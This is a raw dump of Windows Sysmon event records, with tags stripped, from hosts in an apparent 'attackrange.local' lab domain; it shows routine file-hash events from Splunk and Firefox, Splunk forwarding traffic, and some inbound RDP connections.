07:56:33.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE835E63D94C68B47CE003245BF5CD5,SHA256=BE15ED923C8D36F89E026621C11E150F468404E689D704F4446FBA7F1B3E73AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:33.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D4E0A261FB9253608ED63330DFFCA14,SHA256=851137E06EB36FEA2B0150053938921717768E1A7349A0804BD990F9D2629F09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51086-false10.0.1.12-8000- 23542300x80000000000000001050427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68C3560687899EB418A2EBC68665531A,SHA256=B5ACA730EB1D2D9F49B2A7685C77242762AA08EA65CE13449A40041F5570976A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=33E23D96CE607BE152EFD83B82ADF424,SHA256=6D712170AD9C5E89B201A8C93963C8F55AB2A5214A27D7E0DE4983B3FEC9835C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3EC8647AC9882DCFAE2BC6F8EC17B538,SHA256=6F666A316EDC558C8116085928BFF9DD73D734D4DD731F041F4833A72F92D834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3A0500DBA341EF53373EF424ABCD8E8D,SHA256=2102A5A21669384032D0DA4CB28C91550B73B23D2C458D388EA1B2C7BB11B99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E30F09FFD6267FC94F0559DA92A57F92,SHA256=BF6D7CE80EEE34F6CD8A1C2FABF676669E7E2DBA2FF4D900E0529E56A4F7C9C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=44412CD4A53B2FB4712437ED18DAE74F,SHA256=B7906D991B2CF9523B9849787B8245A0858350C8052A059CE9ACD477450CADA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=27DA64B7B254914428BA483604C72830,SHA256=A57AD32C7DE888ECD2BC287A0F4ED7DBEA464FCBB463CF7CC824A779E467CEB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2319ED50746ED330895CE94CB67E6769,SHA256=D3F6F64CE8FCA30210B14123264182AFFB6DA46F32917A082E2F625D9EAC9DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=625C904D3F729C15826F1F5ADD9D50A0,SHA256=7FB5FEA846B842001D7AE7640B71A1D851EC6A54D5BD96A55CF27E4478F428E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4C541547BC4548292461DC76A7186746,SHA256=53C6A9A2AE0622EA3D38C49CDAA5A4E0B62BBC9CA4F3B42CD9F5A74F99D4D056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:33.023{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=333A39B5440B7FCDA5F4772A29C50123,SHA256=6CB16B7EF50982B3B289542C8D358EE179594BBA34E6E5A0EF6E853DC5CDEEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:34.786{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2959F333630D65311EBC18F1BF41E7,SHA256=42680BB5F79D1C13C446FB87DC2CA5993FD1460A8BA2154122878F8F3BA6D083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:34.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E77D0D3FD1F64920EC8F2C21139E1D,SHA256=3385B7D4C7EDF73DCB394DC8BE7A88D6671F3BD6965E33BACC702F8B278E9398,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:35.805{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8D66552EA9C12BBCFA2F161097F61B,SHA256=A8D60B8FAA9BFC8DE0E6824396F8996DFA37B56B64A4D469C62F8F38EAF9AF9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:34.276{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57321-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:35.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DC8E35B39C92421B01227361F4DFDFB,SHA256=B9C5558B10FE7753DAA355732F7D7E82AFBC455738D34E67047B5531A395A679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:36.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61BDAC1E23E932C24034BCA2B28028F3,SHA256=89EBD50EE609BF4D1680BDCB07AB00ECE05AA3DA99D1B80501DA3157DF7CB2C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:36.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CCF4479B9B693071E434095E4C3B6D,SHA256=50870837FF4C54FCB4496263224E435C6A11F979810182904489AC0E0146EC68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:37.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CC248960B7D31B024E7C0EBFCC4757,SHA256=CEDD598CC49D9351233C2750EAB64F5FBCAEB2614DEB202358DA15BDBE765689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:37.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124ABA2873B1EF2780DC36E890ED4FBF,SHA256=68AE0EEFC997B70C9C50F07693A290A43449AB2374DB2FA80ED859479E77E797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.822{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94BF2C7FFB138F2B89F3D518A533FC0,SHA256=6222E4DEE557A7EADE346B98F8FDF1C1619906FB110CF6EC733210245CE703B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:38.195{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50600FE591C1ECE88D0D6BC8108D549F,SHA256=2C6C62FD7F802A72EEF02742FE884FF2FFD6AC6C5FEBF0E02F4627447A4656DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.567{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5C5AFFB1B9551793FF69D5610605347B,SHA256=C768A49AC740D017E0DEDD6F3CE4227AEEB3422170FBCB1F61847492C8B98021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29311D20573FFE5442B4260C5EE5CC57,SHA256=FE12F28C9C473B5D2E06D79A12627647374B60082A1C469E50952CA14CB658A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=59C8415FF6ED8F4030BBA92FEB248AAA,SHA256=02F3D0A2101DA5ED8CF4F968CE7FFF68BBD0AC084F0FE0F6A89E97965E69B9AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D358BC3B5AC64CB9423269834D79697F,SHA256=C77B9FF798C995742A8979E855CA1B5540D68E4B9B226E610D224BD3874D91C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D2A9B3873BA74A4D4776A6F2288B7E1F,SHA256=E51AC6E84B22B3F3555BD87A387DD4956D8DDAF431853CC43D9C1EEC93A4BEB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5FE9E02936E3D7EA1835A6DF6AB0619C,SHA256=0A7743DDC9264642BAD6AE6AC29439EF469A5772CCA52849F8A9D76F006F55BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F0A06660E6E1D9C73DDBFB7E8401E7EF,SHA256=0B7839835CAC684946E93D4CE6020850DD41E96A99336D5A5292BE174656A239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A415C81EDC665E6CB75900669147D053,SHA256=83B4FEE9D9F4C63D85085E5DC3259C669E12B0F1A09C91B0EBB72820264C42F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60CCE946B4B6952EB56A1174A74F1045,SHA256=62DDA64F07B0F8E6C30582BC34296BEAF5ABAA62FBB0D35B2BCE7A64270488A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72CFCB320DDA76E7EF2CC44C1753CA36,SHA256=609EDF6EFEF5F6D46DE7B75E79ABBBE5026FC735116820BF08E331BA643CBB9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA2FDE5870EDCDFD2C0D3C85B0314A64,SHA256=F8D3E3C20C290ABA7D6903564D7AD08CF735A74C81D34F48D26BA12CD45C656B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C05AA75CAB1B98CE1AFCAFC924B8A7B,SHA256=CCEA4D494D1C8EE78D25407EE557094C70102B65D9F276E62743D2988E94432E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:39.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C801C903FAC50C46C88062B7D2C576,SHA256=2464EAD8342C4BB43997A1488DD59C6DB9B3AEB3C7663A9E3D4F5112E306E609,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:37.616{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.86.161.15593-86-161-155.static.isp.telekom.rs57278-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65200BCDF717C62B4CF2DD8AFC43601A,SHA256=F41E25B3252A246F8A2591A8D4EA7F10CF564AAFD3D56B335DB13585FD009564,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:30.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51087-false10.0.1.12-8000- 23542300x8000000000000000808385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0E3394E0EC6AFD6D3FFA043A51E4EA,SHA256=6831E2C26CA41BA908D9BB7C9256D6C51119E4142E93A1DD35B22E12C7D70BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC245F043462AD9EDF5443E0EE92C813,SHA256=9D223C56E0F21E258F4EE9352E5FE29C342EB0E17CACD3B4A981DC431154DBDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:40.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2821C70F67A9FAC0B363A7D9228FB63B,SHA256=55AB2984A52468377710055ACCAED23B6B2656C445FD1335DC714449CCB1A2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:40.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3924CDA665ED002B47EAC8C9F80EE7,SHA256=70CCED71F0DADCFC80AA3324A16F0EA3E40071E3845D77A24D80C30C8192EC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:41.854{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951C6CDB4D56A5E1D91C1676BF928427,SHA256=940B3CC082D5BF77C7993EF345D14870C32D34E30575497EC1CD3FA47C8C8E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:40.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57322-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.634{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-58411-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:41.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0E3394E0EC6AFD6D3FFA043A51E4EA,SHA256=6831E2C26CA41BA908D9BB7C9256D6C51119E4142E93A1DD35B22E12C7D70BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:41.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAAF6851C2B69EC9686BFC1E6A76DCE3,SHA256=F2B591B631B4BC83F45B36250CE53F4AFA6952216910966BA4F0A27CB4369487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA941EF5AA20329526C6DA0842D3A1A7,SHA256=2C9E9AD01F4DD909F7D6FFA16D5626CB6FA23F9EFC84B05C6E3CA5C5BF695AD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:42.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CA6CA1A252F32B8B44DA780734DCE7,SHA256=253274AD6C80673B5B90E0FE04E643773350B007D6AA66DB5C32CFC275BD00EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 